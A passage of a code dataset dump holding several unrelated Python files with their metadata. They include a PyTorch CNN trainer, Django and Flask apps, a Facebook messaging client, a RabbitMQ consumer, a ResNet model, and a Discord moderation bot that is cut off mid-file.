{6}\"\n print(msg.format(epoch + 1, train_loss, train_acc, test_loss, test_acc, time_dif, improved_str))\n\n test_acc, test_f1 = test(model, test_data, config.model_file)\n\n\n return test_acc, test_f1\n\n\ndef test(model, test_data, model_file):\n \"\"\"\n Test the model on test dataset.\n \"\"\"\n print(\"Testing...\")\n start_time = time.time()\n test_loader = DataLoader(test_data, batch_size=50)\n\n # restore the best parameters\n model.load_state_dict(torch.load(model_file, map_location=lambda storage, loc: storage))\n\n y_true, y_pred = [], []\n for data, label in test_loader:\n data, label = Variable(data, volatile=True), Variable(label, volatile=True)\n if use_cuda:\n data, label = data.cuda(), label.cuda()\n\n output = model(data)\n pred = torch.max(output.data, dim=1)[1].cpu().numpy().tolist()\n y_pred.extend(pred)\n y_true.extend(label.data)\n\n test_acc = metrics.accuracy_score(y_true, y_pred)\n test_f1 = metrics.f1_score(y_true, y_pred, average='macro')\n # print(\"Test accuracy: {0:>7.2%}, F1-Score: {1:>7.2%}\".format(test_acc, test_f1))\n\n # print(\"Precision, Recall and F1-Score...\")\n # print(metrics.classification_report(y_true, y_pred, target_names=['POS', 'NEG']))\n\n # print('Confusion Matrix...')\n cm = metrics.confusion_matrix(y_true, y_pred)\n # print(cm)\n\n # print(\"Time usage:\", get_time_dif(start_time))\n\n return test_acc,test_f1\n\n\n# def predict(text):\n# # load config and vocabulary\n# config = TCNNConfig()\n# _, word_to_id = read_vocab(vocab_file)\n# labels = ['POS', 'NEG']\n#\n# # load model\n# model = TextCNN(config)\n# model.load_state_dict(torch.load(model_file, map_location=lambda storage, loc: storage))\n#\n# # process text\n# text = process_text(text, word_to_id, config.seq_length)\n# text = Variable(torch.LongTensor([text]), volatile=True)\n#\n# if use_cuda:\n# model.cuda()\n# text = text.cuda()\n#\n# # predict\n# model.eval() # very important\n# output = model(text)\n# pred = torch.max(output, dim=1)[1]\n#\n# return labels[pred.data[0]]\n\n\nif __name__ == '__main__':\n\n # iterate each small dataset\n # iterate each small dataset\n file_list = [f for f in os.listdir(train_path)]\n test_file_list = [f for f in os.listdir(test_path)]\n accuracy = []\n f1 = []\n for test_file in test_file_list:\n config = TCNNConfig()\n config.abbre = test_file.split('_')[0]\n print ('Now...',config.abbre)\n config.file_path = train_path + config.abbre + '.txt'\n config.test_path = test_path + test_file\n config.model_file = os.path.join(save_path, config.abbre)\n\n score, f1_score = train(config)\n\n accuracy.append(score)\n f1.append(f1_score)\n print(config.abbre, score, f1_score)\n\n print('Average acc %0.4f' % (sum(accuracy) / len(accuracy)))\n print('Average f1 %0.4f' % (sum(f1) / len(f1)))\n\n\n # file_list = [f for f in os.listdir(test_path)]\n # accuracy = []\n # f1 = []\n # for f in file_list:\n # config = TCNNConfig()\n # # update train and test path\n # config.file_path += f\n # config.test_path += f\n # config.model_file = os.path.join(save_path, f)\n #\n # score, f1_score = train(config)\n #\n # accuracy.append(score)\n # f1.append(f1_score)\n # print(f, score, f1_score)\n #\n # print('Average acc %0.4f' % (sum(accuracy) / len(accuracy)))\n # print('Average f1 %0.4f' % (sum(f1) / len(f1)))\n\n\n\n# macro\n# Average acc 0.9386\n# Average f1 0.7609\n# 0.9452 0.7562\n\n\n# micro\n# 0.9450 0.9450\n\n\n# with 5-fold\n# micro\n# Average acc 0.9358\n# Average f1 0.9358\n\n\n'''\n\n\n'''","sub_path":"src/cnn_pytorch.py","file_name":"cnn_pytorch.py","file_ext":"py","file_size_in_byte":10975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"255884065","text":"__author__ = 'Anna'\n\nfrom sqlalchemy import Column, ForeignKey, Integer\nfrom sqlalchemy.orm import relationship\nfrom Base import *\n\n\nclass SetPersonTypeApplicationType(Base):\n\n __tablename__ = 'set_person_type_application_type'\n\n application_type = Column(Integer, ForeignKey('cl_application_type.code'), primary_key=True)\n application_type_ref = relationship(\"ClApplicationType\")\n\n person_type = Column(Integer, ForeignKey('cl_person_type.code'), primary_key=True)\n person_type_ref = relationship(\"ClPersonType\")\n","sub_path":"model/SetPersonTypeApplicationType.py","file_name":"SetPersonTypeApplicationType.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"339487599","text":"#!/usr/bin/env python\n#coding:utf-8\n#{'teacher_name':'halen','sex':'female','age':'27','assets':15000,'course':[],'identity':'teacher'}\nfrom Course_system.lib import Open_file\nclass Teacher():\n def __init__(self,teacher_name,sex,age,assets):\n self.teacher_name=teacher_name\n self.sex=sex\n self.age=age\n self.assets=assets\n #self.course=[]\n\n def teach_fee(self):\n pass\n\n @staticmethod\n def create_change_teacher_info(choice_msg,data):\n flag=False\n while not flag:\n #传入的choice_msg为3时,为创建老师,判断原数据是否存在,不存在就创建并写入数据,存在就打印已经存在\n if choice_msg=='3':\n res_data = Open_file.Open_file_class(Open_file.teacher_info_file).read()\n if data['teacher_name'] in res_data:\n print('The curriculum already exists,if you do not continue, press the q key')\n break\n res_course = Teacher(data['teacher_name'], data['sex'],\n data['age'],data['assets'])\n print('create teacher information successfully!')\n\n #拼接成字典\n new_course_dict = {data['teacher_name']: data}\n file_name=Open_file.teacher_info_file\n f = Open_file.Open_file_class(file_name, model='wb')\n res_data.update(new_course_dict)\n\n # print(res_data.update(new_course_dict))\n f.write(res_data)\n # print(res_data)\n return res_course\n\n #当choice_msg为4的时候,就判断���据是否存在,如不存在就打印不存在,存在则update并写入\n elif choice_msg == '4':\n read_data = Open_file.Open_file_class(Open_file.teacher_info_file).read()\n if data['teacher_name'] in read_data:\n new_course = {data['teacher_name']: data}\n read_data.update(new_course)\n Res = Open_file.Open_file_class(Open_file.teacher_info_file, model='wb')\n Res.write(read_data)\n print('change teacher information successfully')\n return True\n else:\n print('teacher is not exists')\n break\n else:\n return False\n\n\n @staticmethod\n def choice_tercher_func():\n f=Open_file.Open_file_class(Open_file.teacher_info_file)\n userdata=f.read()\n for i in userdata:\n print(i)\n #print(userdata[i])\n\n\n\n\n\n\nif __name__ == '__main__':\n Teacher.choice_tercher_func()","sub_path":"autoclient/Course_system/src/Teacher_class.py","file_name":"Teacher_class.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"36843254","text":"from mss import mss\nimport cv2\nimport time\nimport sys\n\n# time.sleep(2)\n# with mss() as sct:\n# filename = sct.shot()\n\n# img = cv2.imread(filename)\n\ndef screenshot():\n print (False)\n with mss() as sct:\n filename = sct.shot()\n img = cv2.imread(filename)\n img = cv2.resize(img,(900,600))\n img = img[100:540, 250:860]\n # cv2.imshow(\"cropped\", img)\n # cv2.waitKey(0)\n cv2.imwrite(sys.argv[1],img)\n print (True)\n sys.stdout.flush()\n","sub_path":"src/takeScreenShot.py","file_name":"takeScreenShot.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"592515049","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.IndexView.as_view(), name='index'),\n path('/', views.DetailView.as_view(), name='detail'),\n path('serwis/', views.SerwisIndexView.as_view(), name='serwis-index'),\n path('serwis/add/', views.SerwisCreate.as_view(), name='serwis-create'),\n path('serwis//del/', views.SerwisDelete.as_view(), name='serwis-delete'),\n path('serwis//update/', views.SerwisUpdate.as_view(), name='serwis-update'),\n path('sprzety/', views.SprzetIndexView.as_view(), name='sprzet-index'),\n path('sprzety//', views.SprzetDetailView.as_view(), name='sprzet-detail'),\n path('sprzety/add/', views.SprzetCreate.as_view(), name='sprzet-create'),\n path('sprzety//del/', views.SprzetDelete.as_view(), name='sprzet-delete'),\n path('sprzety//update/', views.SprzetUpdate.as_view(), name='sprzet-update'),\n]\n","sub_path":"sprzet/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"29363769","text":"import pickle\nimport os\nimport requests as r\nfrom bs4 import BeautifulSoup as b\nfrom getpass import getpass, getuser\n\nFB_URL = \"https://mbasic.facebook.com\"\nFB_QUERY = FB_URL + \"/search/?query=\"\nFB_MSG = FB_URL + \"/messages/read/?fbid=\"\n\nCOOKIES = \"/home/\" + getuser() + \"/.mercurius_c\"\n\n\ndef need_connection(f):\n def dec(self, *args, **kwargs):\n if self.connected:\n return f(self, *args, **kwargs)\n else:\n \"[✖]Not connected.\"\n return dec\n\n\nclass Facebook:\n def __init__(self, cookies_enabled):\n self.connected = False\n self.cookies = None\n self.s = r.Session()\n self.cookies_enabled = True if int(cookies_enabled) else False\n if os.path.exists(COOKIES):\n if self.cookies_enabled:\n with open(COOKIES, 'rb') as c:\n self.cookies = pickle.load(c)\n get = self.s.get(FB_URL, cookies=self.cookies)\n self.check_connection(b(get.text, \"lxml\"))\n else:\n os.remove(COOKIES)\n else:\n self.email = input(\"[?]Email: \")\n self.password = getpass(\"[?]Password: \")\n self.connect()\n\n def check_connection(self, html):\n # 2 Steps auth\n if html.find('input', id=\"approvals_code\"):\n action = html.find('form').get('action')\n inputs = html.findAll('input')\n post_data = {}\n for tag in inputs:\n if tag[\"type\"] != \"text\":\n post_data[tag[\"name\"]] = tag[\"value\"]\n else:\n post_data[\"approvals_code\"] = getpass(\"[?]Code: \")\n post = self.s.post(FB_URL + action, data=post_data)\n self.check_connection(b(post.text, \"lxml\"))\n elif html.find('div', title=\"Remember Browser\"):\n action = html.find('form').get('action')\n inputs = html.findAll('input')\n post_data = {}\n for tag in inputs:\n if tag[\"type\"] in [\"hidden\", \"submit\"]:\n post_data[tag[\"name\"]] = tag[\"value\"]\n else:\n post_data[\"action_name_selected\"] = \"save_device\"\n post = self.s.post(FB_URL + action, data=post_data)\n self.check_connection(b(post.text, \"lxml\"))\n self.connected = True\n\n def connect(self):\n html = b(self.s.get(FB_URL).text, \"lxml\")\n post_data = {}\n action = html.find('form', id='login_form').get('action')\n inputs = html.findAll('input')\n for tag in inputs:\n if tag[\"type\"] == \"hidden\" and tag[\"name\"] != \"_fb_noscript\":\n post_data[tag[\"name\"]] = tag[\"value\"]\n elif tag[\"name\"] == \"login\":\n post_data[\"email\"] = self.email\n post_data[\"pass\"] = self.password\n post_data[\"login\"] = tag[\"value\"]\n post = self.s.post(action, data=post_data)\n self.check_connection(b(post.text, \"lxml\"))\n if self.connected:\n if self.cookies_enabled:\n self.cookies = self.s.cookies\n self.save_cookies()\n else:\n print(\"[✖]Log in failed. Wrong email/password ?\")\n\n @need_connection\n def save_cookies(self):\n with open(COOKIES, 'wb') as f:\n pickle.dump(self.cookies, f)\n\n @need_connection\n def get_user_id_fullname(self, name):\n rq = b(self.s.get(FB_QUERY + name, cookies=self.cookies).text, \"lxml\")\n ids = [self.get_id_from_msg_url(url[\"href\"]) for url in rq.findAll('a')\n if \"/messages/compose/?ids=\" in url[\"href\"]]\n # For the moment we suppose that the name provided for the query\n # is accurate enough so that the first result matches the right person\n if len(ids) == 0:\n return None, None\n return ids[0], rq.find(\"td\", {\"class\": \"bk\"}).find('a').text\n\n @need_connection\n def get_last_message_date(self, id):\n rq = b(self.s.get(FB_MSG + id, cookies=self.cookies).text, \"lxml\")\n return rq.findAll(\"abbr\")[-1].text\n\n def get_id_from_msg_url(self, url):\n return url.split(\"=\")[1].split(\"&\")[0]\n\n @need_connection\n def send_message(self, msg, id):\n html = b(self.s.get(FB_MSG + id, cookies=self.cookies).text, \"lxml\")\n post_data = {}\n form = html.find('form', id='composer_form')\n action = form.get('action')\n inputs = form.findAll('input')\n for tag in inputs:\n if tag[\"type\"] == \"hidden\" and tag.has_attr(\"value\"):\n post_data[tag[\"name\"]] = tag[\"value\"]\n post_data['body'] = msg\n post = self.s.post(FB_URL + action, data=post_data, cookies=self.cookies)\n","sub_path":"mercurius/facebook.py","file_name":"facebook.py","file_ext":"py","file_size_in_byte":4713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"152399318","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport torch.nn as nn\nimport torch\nimport logging\nimport numpy as np\nfrom contrib import adf\nfrom opts import parser\n\nFLAGS = parser.parse_args()\n\n\ndef keep_variance(x, min_variance):\n return x + min_variance\n\n\ndef finitialize_msra(modules, small=False):\n logging.info(\"Initializing MSRA\")\n for layer in modules:\n if isinstance(layer, adf.Conv2d) or isinstance(layer, adf.Linear): # convolution: bias=0, weight=msra\n nn.init.kaiming_normal_(layer.weight)\n if small:\n layer.weight.data.mul_(0.001)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n\n\ndef finitialize_xavier(modules, small=False):\n logging.info(\"Initializing Xavier\")\n for layer in modules:\n if isinstance(layer, adf.Conv2d) or isinstance(layer, adf.Linear): # convolution: bias=0, weight=msra\n nn.init.xavier_normal_(layer.weight)\n if small:\n layer.weight.data.mul_(0.001)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n\nclass Resnet8_MCDO_adf(nn.Module):\n\n def __init__(self, img_channels, output_dim, noise_variance=1e-3, min_variance=1e-3, initialize_msra=False):\n super(Resnet8_MCDO_adf, self).__init__()\n \n p = FLAGS.dropout\n self._keep_variance_fn = lambda x: keep_variance(x, min_variance=min_variance)\n self._noise_variance = noise_variance\n self.layer1 = adf.Sequential(\n adf.Conv2d(\n in_channels=img_channels, out_channels=32, kernel_size=5, padding=5//2,\n stride=2, bias=True, keep_variance_fn=self._keep_variance_fn),\n adf.Dropout(p, keep_variance_fn=self._keep_variance_fn),\n adf.MaxPool2d(keep_variance_fn=self._keep_variance_fn))\n \n self.residual_block_1a = adf.Sequential(\n adf.BatchNorm2d(32),\n adf.ReLU(),\n adf.Conv2d(\n in_channels=32, out_channels=32, kernel_size=3, padding=3//2,\n stride=2, bias=True, keep_variance_fn=self._keep_variance_fn),\n adf.Dropout(p, keep_variance_fn=self._keep_variance_fn),\n adf.BatchNorm2d(32),\n adf.ReLU(),\n adf.Conv2d(\n in_channels=32, out_channels=32, kernel_size=3, padding=3//2,\n bias=True, keep_variance_fn=self._keep_variance_fn),\n adf.Dropout(p, keep_variance_fn=self._keep_variance_fn))\n \n self.parallel_conv_1 = adf.Sequential(\n adf.Conv2d(\n in_channels=32, out_channels=32, kernel_size=1, padding=1//2,\n stride=2, bias=True, keep_variance_fn=self._keep_variance_fn),\n adf.Dropout(p, keep_variance_fn=self._keep_variance_fn))\n \n self.residual_block_2a = adf.Sequential(\n adf.BatchNorm2d(32),\n adf.ReLU(),\n adf.Conv2d(\n in_channels=32, out_channels=64, kernel_size=3, padding=3//2,\n stride=2, bias=True, keep_variance_fn=self._keep_variance_fn),\n adf.Dropout(p, keep_variance_fn=self._keep_variance_fn),\n adf.BatchNorm2d(64),\n adf.ReLU(),\n adf.Conv2d(\n in_channels=64, out_channels=64, kernel_size=3, padding=3//2,\n bias=True, keep_variance_fn=self._keep_variance_fn),\n adf.Dropout(p, keep_variance_fn=self._keep_variance_fn))\n \n self.parallel_conv_2 = adf.Sequential(\n adf.Conv2d(\n in_channels=32, out_channels=64, kernel_size=1, padding=1//2,\n stride=2, bias=True, keep_variance_fn=self._keep_variance_fn),\n adf.Dropout(p, keep_variance_fn=self._keep_variance_fn))\n \n self.residual_block_3a = adf.Sequential(\n adf.BatchNorm2d(64),\n adf.ReLU(),\n adf.Conv2d(\n in_channels=64, out_channels=128, kernel_size=3, padding=3//2,\n stride=2, bias=True, keep_variance_fn=self._keep_variance_fn),\n adf.Dropout(p, keep_variance_fn=self._keep_variance_fn),\n adf.BatchNorm2d(128),\n adf.ReLU(),\n adf.Conv2d(\n in_channels=128, out_channels=128, kernel_size=3, padding=3//2,\n bias=True, keep_variance_fn=self._keep_variance_fn),\n adf.Dropout(p, keep_variance_fn=self._keep_variance_fn))\n \n self.parallel_conv_3 = adf.Sequential(\n adf.Conv2d(\n in_channels=64, out_channels=128, kernel_size=1, padding=1//2,\n stride=2, bias=True, keep_variance_fn=self._keep_variance_fn),\n adf.Dropout(p, keep_variance_fn=self._keep_variance_fn))\n \n self.output_dim = output_dim\n\n self.last_block = adf.Sequential(\n adf.ReLU(),\n adf.Linear(6272,self.output_dim))\n \n # Initialize layers exactly as in Keras\n for layer in self.modules():\n if isinstance(layer, adf.Conv2d) or isinstance(layer, adf.Linear): # convolution: bias=0, weight=msra\n nn.init.xavier_uniform_(layer.weight, gain=nn.init.calculate_gain('relu'))\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, adf.BatchNorm2d): \n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)\n \n\n \n def forward(self, x):\n \n inputs_mean = x\n inputs_variance = torch.zeros_like(inputs_mean) + self._noise_variance\n x = inputs_mean, inputs_variance\n x1 = self.layer1(*x)\n # First residual block\n x2 = self.residual_block_1a(*x1)\n x1 = self.parallel_conv_1(*x1)\n x3_mean = x1[0].add(x2[0])\n x3_var = x1[1].add(x2[1])\n x3 = x3_mean, x3_var\n # Second residual block\n x4 = self.residual_block_2a(*x3)\n x3 = self.parallel_conv_2(*x3)\n x5_mean = x3[0].add(x4[0])\n x5_var = x3[1].add(x4[1])\n x5 = x5_mean, x5_var\n # Third residual block\n x6 = self.residual_block_3a(*x5)\n x5 = self.parallel_conv_3(*x5)\n x7_mean = x5[0].add(x6[0])\n x7_var = x5[1].add(x6[1])\n x7 = x7_mean, x7_var\n \n out_mean = x7[0].view(x7[0].size(0), -1) # Flatten\n out_var = x7[1].view(x7[1].size(0), -1)\n out = out_mean, out_var\n out = self.last_block(*out)\n \n return out\n\n","sub_path":"src/model_zoo/resnet8_MCDO_adf.py","file_name":"resnet8_MCDO_adf.py","file_ext":"py","file_size_in_byte":6615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"653183295","text":"\"\"\"\nLists all .raw_hdf5 files in a RawVideos folder and tries to find the matching MaskedVideos. \nOnly works on Phenix videos.\n\"\"\"\n\nimport sys\nimport pandas as pd\nfrom pathlib import Path\n\ndef best_guess_for_masked_video(rawvideo_fname):\n expected_maskedvideo_fname = str(rawvideo_fname.with_suffix('.hdf5'))\n expected_maskedvideo_fname = Path(expected_maskedvideo_fname.replace('RawVideos','MaskedVideos'))\n return expected_maskedvideo_fname\n\n\ndef find_mismatched_Phenix_videos(rawvideos_dir):\n \"\"\"Tries to find masked videos by applying the same name transformation that Tierpsy does:\n RawVideos -> MaskedVideos, .raw_hdf5 -> .hdf5\n Only works on Phenix videos taken using the Gecko plugin\"\"\"\n\n # initialise mismatched list\n mismatched_rawvideos = []\n # initialise status variable\n any_rawvideos = False\n \n # list all raw videos, if none, abort\n rawvideos_list = list(rawvideos_dir.rglob('*.raw_hdf5'))\n if len(rawvideos_list) == 0:\n return any_rawvideos, mismatched_rawvideos\n else:\n any_rawvideos = True\n # for each of the raw videos:\n for rawvideo_fname in rawvideos_list:\n # get the best guess for the masked video\n expected_maskedvideo_fname = best_guess_for_masked_video(rawvideo_fname)\n # print(expected_maskedvideo_fname)\n # if it does not exist\n if not expected_maskedvideo_fname.exists():\n # append to mismatched list\n mismatched_rawvideos.append(rawvideo_fname.relative_to(rawvideos_dir))\n return mismatched_rawvideos\n \n\nif __name__=='__main__':\n \n # call function\n rawvideos_dir = Path(sys.argv[1])\n any_rawvideos, mismatched_rawvideos = find_mismatched_Phenix_videos(rawvideos_dir)\n if not any_rawvideos:\n print('No Raw videos')\n else:\n # now print results\n if len(mismatched_rawvideos) > 0:\n print('Raw videos missing a masked video')\n print('In {}'.format(rawvideos_dir))\n for fname in mismatched_rawvideos:\n print(fname)\n else:\n print('No mismatch in {}'.format(rawvideos_dir))","sub_path":"mytierpsytools/check_files_analysed.py","file_name":"check_files_analysed.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"251688506","text":"import sqlite3\nfrom flask import Flask, request\nfrom flask_restful import Resource, Api, reqparse\n\n \n\nitems = []\n\n\nclass ItemList(Resource):\n def get(self):\n connection = sqlite3.connect('data.db')\n cursor = connection.cursor()\n\n queryGetItems = \"SELECT * FROM items\"\n row = cursor.execute(queryGetItems)\n row = cursor.fetchall()\n \n connection.commit()\n connection.close()\n print(row)\n items = []\n if(row):\n for item in row:\n items.append({'name': item[0], 'price': item[1]})\n return items\n else:\n return {\"message\": \"Items nor found\"}\n\n # return {'items': items}, 200\n","sub_path":"code/itemlist.py","file_name":"itemlist.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"108780559","text":"'''\n magic-cards consumer\n\n A RabbitMQ consumer that saves data to JSON.\n'''\nimport json\nimport logging\nimport os\nfrom threading import Lock\n\nfrom connection import pika_conn\nfrom dao import get_cards, read_file, write_file\nfrom settings import ALL, MQ_HOST, MQ_MOVE_QUEUE\n\ncache = {}\nlock = Lock()\n\ndebug = os.getenv('DEBUG', False)\nlogger = logging.getLogger('consumer')\nlogging.basicConfig(level=logging.DEBUG if debug else logging.WARN)\n\n\ndef on_message(ch, method, properties, body):\n '''\n Parse messages received by RabbitMQ\n '''\n logger.debug('Message received')\n try:\n message = body.decode('utf-8')\n if message == ALL:\n global cache\n cache = {card['GathererId']: card for card in get_cards()}\n else:\n data = json.loads(message)\n for card in data:\n cache[card['GathererId']] = card\n except Exception as e:\n logger.exception(e)\n else:\n with lock:\n write_file(cache)\n logger.warn('Text file updated')\n\n\ndef start():\n '''\n Setup RabbitMQ queue binding\n '''\n logger.info('Starting consumer')\n\n try:\n global cache\n cache = read_file()\n except (FileNotFoundError, json.decoder.JSONDecodeError):\n pass\n\n with pika_conn(MQ_HOST, MQ_MOVE_QUEUE) as channel:\n channel.basic_consume(\n on_message,\n queue=MQ_MOVE_QUEUE,\n no_ack=True)\n\n print(' [*] Waiting for messages. To exit press CTRL+C')\n channel.start_consuming()\n\n\nif __name__ == '__main__':\n start()\n","sub_path":"src/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"36465545","text":"from ensemble_compilation.graph_representation import SchemaGraph, Table\n\n\ndef gen_cover_schema(csv_path=\"./ssb-benchmark/cover.csv\"):\n\n schema = SchemaGraph()\n schema.add_table(Table('cover',\n attributes=['c0','c1','c2','c3','c4','c5','c6','c7','c8','c9'],\n irrelevant_attributes=None,\n no_compression=['c0','c1','c2','c3','c4','c5','c6','c7','c8','c9'],\n csv_file_location=csv_path,\n table_size=581012, primary_key=['c0'],\n ))\n\n return schema\n","sub_path":"schemas/cover/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"334155412","text":"\"\"\"blog URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom qblog.views import index, category_archive, about, page, archvie_list\n#import django_markdown.urls\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', index, name = 'home'),\n url(r'^markdown/', include('django_markdown.urls')),\n\n url(r'^category/(?P\\w+)/$', category_archive, name = 'article_category'),\n url(r'^page/(?P\\d+)/$', page, name = 'article_page'),\n url(r'^archive/$', archvie_list, name = 'archvie_list'),\n\n url(r'about/', about, name = 'about_me'),\n\n]\n","sub_path":"blog/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"595494029","text":"from __future__ import annotations\n\nfrom src.single_guild_bot import SingleGuildBot as Bot\n\nfrom abc import ABC, abstractmethod\nfrom enum import Enum, unique\nfrom dataclasses import dataclass, field\n\nimport datetime\nimport random\nfrom typing import Tuple, List\n\nimport discord\nfrom discord.ext import commands\nfrom discord.utils import get\n\nfrom config import Roles\n\nDEFAULT_PUNISHMENT_UNIT = \"minutes\"\nDEFAULT_PUNISHMENT_AMOUNT = 5\n\nUNITS = [\"minute\", \"minutes\", \"min\", \"hour\", \"hours\", \"day\", \"days\"]\nGENERIC_REASONS = [\n \"inappropriate behavior\",\n \"breaking the community guidelines\",\n \"breaking rules\",\n]\n\n\n@unique\nclass PunishmentID(Enum):\n WARN = \"WARN\"\n MUTE = \"MUTE\"\n KICK = \"KICK\"\n BAN = \"BAN\"\n PERMABAN = \"PERMABAN\"\n\n @classmethod\n async def convert(cls, _: commands.Context, punishment_type: str):\n return PunishmentID[punishment_type.upper()]\n\n @staticmethod\n def timed_punishments() -> List[PunishmentID]:\n return [PunishmentID.MUTE, PunishmentID.BAN]\n\n\ndef get_random_reason() -> str:\n return random.choice(GENERIC_REASONS)\n\n\ndef extract_amount_and_unit(argument) -> Tuple[int, str, str]:\n \"\"\"A simple input parser to get amount, unit and reason from a command string\"\"\"\n argument = argument.split()\n\n if argument[0].isnumeric() and argument[1] in UNITS:\n command_amount, command_unit = int(argument[0]), argument[1]\n command_reason = (\n get_random_reason() if len(argument) == 2 else \" \".join(argument[2:])\n )\n\n else:\n command_amount = DEFAULT_PUNISHMENT_AMOUNT\n command_unit = DEFAULT_PUNISHMENT_UNIT\n command_reason = \" \".join(argument)\n\n return command_amount, command_unit, command_reason\n\n\ndef translate_to_datetime(amount: int, unit: str) -> datetime.datetime:\n \"\"\"Translates user input into a datetime object\"\"\"\n if unit in [\"days\", \"day\"]:\n return datetime.datetime.now() + datetime.timedelta(days=amount)\n elif unit in [\"hours\", \"hour\"]:\n return datetime.datetime.now() + datetime.timedelta(hours=amount)\n elif unit in [\"minutes\", \"minute\", \"min\"]:\n return datetime.datetime.now() + datetime.timedelta(minutes=amount)\n else:\n raise TypeError(\"Can't translate to datetime\")\n\n\n@dataclass(frozen=True)\nclass Punishment(ABC):\n to_punish: discord.Member\n punished_by: discord.Member\n\n reason: str = get_random_reason()\n\n @property\n @classmethod\n @abstractmethod\n def punishment_id(cls) -> PunishmentID:\n raise NotImplementedError\n\n @property\n @classmethod\n @abstractmethod\n def action(cls) -> str:\n raise NotImplementedError\n\n @classmethod\n @abstractmethod\n async def convert(cls, ctx, argument) -> Punishment:\n raise NotImplementedError\n\n @abstractmethod\n async def punish(self, ctx: commands.Context) -> None:\n raise NotImplementedError\n\n @abstractmethod\n def encode_to_mongo(self) -> dict:\n raise NotImplementedError\n\n\n@dataclass(frozen=True)\nclass OneTimePunishment(Punishment, ABC):\n def encode_to_mongo(self) -> dict:\n return {\n \"registry\": {\n \"user_id\": self.to_punish.id,\n \"punishment_id\": self.punishment_id.value,\n \"reason\": self.reason,\n \"punished_by\": self.punished_by.id,\n }\n }\n\n @classmethod\n async def convert(cls, ctx: commands.Context, argument) -> OneTimePunishment:\n to_punish = ctx.args[2]\n return cls(\n to_punish=to_punish,\n punished_by=ctx.author,\n reason=argument,\n )\n\n\n@dataclass(frozen=True)\nclass TimedPunishment(Punishment, ABC):\n amount: int = DEFAULT_PUNISHMENT_AMOUNT\n unit: str = DEFAULT_PUNISHMENT_UNIT\n\n created_at: datetime.datetime = datetime.datetime.now()\n expires: datetime.datetime = field(init=False)\n\n def __post_init__(self):\n object.__setattr__(\n self, \"expires\", translate_to_datetime(self.amount, self.unit)\n )\n\n @classmethod\n @abstractmethod\n async def unpunish(cls, user_id: int, bot: Bot) -> None:\n raise NotImplementedError\n\n @classmethod\n async def convert(cls, ctx: commands.Context, argument) -> TimedPunishment:\n to_punish = ctx.args[2]\n\n amount, unit, reason = extract_amount_and_unit(argument)\n return cls(\n to_punish=to_punish,\n amount=amount,\n unit=unit,\n reason=reason,\n punished_by=ctx.author,\n )\n\n def encode_to_mongo(self) -> dict:\n return {\n \"registry\": {\n \"user_id\": self.to_punish.id,\n \"punishment_id\": self.punishment_id.value,\n \"reason\": self.reason,\n \"punished_by\": self.punished_by.id,\n \"duration\": f\"{self.amount} {self.unit}\",\n \"expires_at\": self.expires,\n },\n \"active\": {\n \"user_id\": self.to_punish.id,\n \"punishment_id\": self.punishment_id.value,\n \"expires_at\": self.expires,\n },\n }\n\n\nclass WarnPunishment(OneTimePunishment):\n punishment_id = PunishmentID.WARN\n action = \"warned\"\n\n async def punish(self, ctx: commands.Context) -> None:\n await ctx.send(\n f\"{self.to_punish.mention} you are being warned for {self.reason}\"\n )\n\n\n@dataclass(frozen=True)\nclass MutePunishment(TimedPunishment):\n punishment_id = PunishmentID.MUTE\n action = \"muted\"\n\n async def punish(self, ctx: commands.Context) -> None:\n muted_role = await self.get_muted_role(ctx.guild)\n\n await self.to_punish.add_roles(muted_role)\n\n @classmethod\n async def unpunish(cls, user_id: int, bot: Bot) -> None:\n try:\n member = await (await bot.the_guild).fetch_member(user_id)\n except discord.errors.NotFound:\n await bot.admin_log(\n f\"Failed to lift punishment\\n\"\n f\" Error : user <{user_id}> is no longer present in the server\"\n )\n else:\n muted_role = await cls.get_muted_role(await bot.the_guild)\n await member.remove_roles(muted_role)\n\n await bot.admin_log(f\"Unpunished user 